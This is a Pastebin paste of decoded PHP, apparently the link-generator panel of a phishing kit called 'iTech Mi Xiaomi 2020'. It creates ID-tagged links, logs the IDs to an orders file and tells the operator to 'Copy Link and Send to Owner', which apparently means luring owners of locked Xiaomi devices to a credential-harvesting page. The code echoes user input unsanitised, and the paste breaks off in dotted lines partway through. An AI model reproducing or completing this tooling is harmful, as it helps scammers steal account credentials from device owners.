Advertisement
Guest User

Untitled

a guest
May 29th, 2020
41
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.11 KB | None | 0 0
  1. <?php
  2. /**
  3. *
  4. * @ This file is created by http://DeZender.Net
  5. * @ deZender (PHP7 Decoder for ionCube Encoder)
  6. *
  7. * @ Version : 4.1.0.0
  8. * @ Author : DeZender
  9. * @ Release on : 15.05.2020
  10. * @ Official site : http://DeZender.Net
  11. *
  12. */
  13.  
  14. function replace_string_in_file($filename, $string_to_replace, $replace_with)
  15. {
  16. $content = file_get_contents($filename);
  17. $content_chunks = explode($string_to_replace, $content);
  18. $content = implode($replace_with, $content_chunks);
  19. file_put_contents($filename, $content);
  20. }
  21.  
  22. echo ' <title>iTech Mi Xiaomi 2020</title>' . "\r\n" . ' ' . "\r\n" . ' <link rel="stylesheet" href="style1.css">' . "\r\n" . '<meta name="viewport" content="initial-scale=1, maximum-scale=1">' . "\r\n" . ' ' . "\r\n" . '</head>' . "\r\n\r\n" . '<body>' . "\r\n" . '<br><br>' . "\r\n" . ' <h1>iTech Mi Xiaomi 2020</h1><br><br>' . "\r\n\r\n\r\n";
  23. echo '<center>' . "\r\n";
  24. echo '<div class="btn-container">' . "\r\n\r\n" . '<h2 style="color:#fff" > Random / ID to create Link</h2>' . "\r\n" . '<br><br>' . "\r\n";
  25. echo ' <form action="" method="post">' . "\r\n\t\t\t\n" . '<input type="text" name="lin" style="font-size:14pt;height:30px;width:80%;" />' . "\n\r\n\t\t\t\n" . '<br><br>' . "\n" . '<input type="submit" name="submit1" class="btn" value="Random link" />' . "\r\n\t\t\n" . '<br>' . "\n" . '<input type="submit" name="submit" class="btn" value="Link By ID" />' . "\r\n\t\t\n" . '<br><br><br>' . "\n" . '<input type="submit" name="submit2" class="btn" value="Block link ID " />' . "\r\n\t\t" . '</form>' . "\r\n\t\t";
  26.  
  27. if (isset($_POST['submit'])) {
  28. $lin = (empty($_POST['lin']) ? exit() : $_POST['lin']);
  29. echo '<textarea onclick="this.select();" style="font-size:14pt;height:80px;width:300px;" >https://' . $_SERVER['HTTP_HOST'] . '/?ID=' . $lin . '</textarea>';
  30. file_put_contents('../ajax/orders.txt', $lin . "\r\n", FILE_APPEND);
  31. echo '<br><br><h3><font color="#fff">' . $threadinfo . ' Copy Link and Send to Owner</font></h3>';
  32. }
  33.  
  34. if (isset($_POST['submit1'])) {
  35. ................................................................
  36. ........................................
  37. ................
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement